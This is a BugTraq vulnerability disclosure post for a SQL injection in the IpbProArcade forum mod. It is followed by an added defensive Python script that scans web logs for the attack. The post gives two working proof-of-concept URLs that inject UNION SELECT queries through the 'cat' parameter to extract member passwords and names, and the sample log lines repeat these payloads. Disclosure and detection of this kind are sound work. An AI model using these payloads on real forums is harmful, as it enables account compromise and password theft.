BugTraq
IpbProArcade 2.5.x SQL injection. Nov 20 2004 08:05PM
axl daivy (axlownz gmail com)


I have found an SQL injection in the popular ipbproarcade mod for IPB systems (1.x and 2.x)

the vuln exists in the "category" field.

by using this field it is possible to inject any SQL query and compromise the entire forum system

p.o.c

for ipb 1.x

http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

for ipb 2.x

index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

discovered by Axl

credit goes to HLL for Helping me write the actual exploit

greetz to CereBrums And JonJon

cheers

Axl

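For defenders reviewing web server logs for the request shape described in the post above, the following is an added example and is not part of the original post or of the ipbProArcade code. It flags `act=Arcade` requests whose `cat` value is not a plain integer, including double-encoded values. It assumes Combined Log Format and that legitimate category ids are short non-negative integers; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request field of a Combined Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate category id is a short non-negative integer.
VALID_CAT = re.compile(r"\d{1,10}")

def suspicious_cat(target):
    """Return the decoded cat value if it is not a plain integer, else None."""
    params = parse_qs(urlsplit(target).query)  # decodes one layer of %XX
    if "arcade" not in [v.lower() for v in params.get("act", [])]:
        return None
    for value in params.get("cat", []):
        # Undo up to two further layers of percent-encoding (%2520 -> %20 -> space).
        for _ in range(2):
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        if not VALID_CAT.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line number, client address, decoded cat value) for each hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = suspicious_cat(match.group(1))
        if value is not None:
            hits.append((number, line.split()[0], value))
    return hits

# Constructed sample log lines (documentation addresses, shortened queries).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Nov/2004:20:01:11 +0000] "GET /index.php?act=Arcade&cat=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [20/Nov/2004:20:03:52 +0000] "GET /index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,0%20FROM%20ibf_members/* HTTP/1.1" 200 812',
    '192.0.2.44 - - [20/Nov/2004:20:04:07 +0000] "GET /index.php?act=Arcade&cat=-1%2520UNION%2520SELECT%25200 HTTP/1.1" 200 790',
    '192.0.2.10 - - [20/Nov/2004:20:05:30 +0000] "GET /index.php?act=Members&cat=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, client, value in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent non-numeric cat: {value!r}")
```

The same integer-only rule, enforced in the application before the value reaches the query, is what closes the hole; the log check only shows who has been probing it.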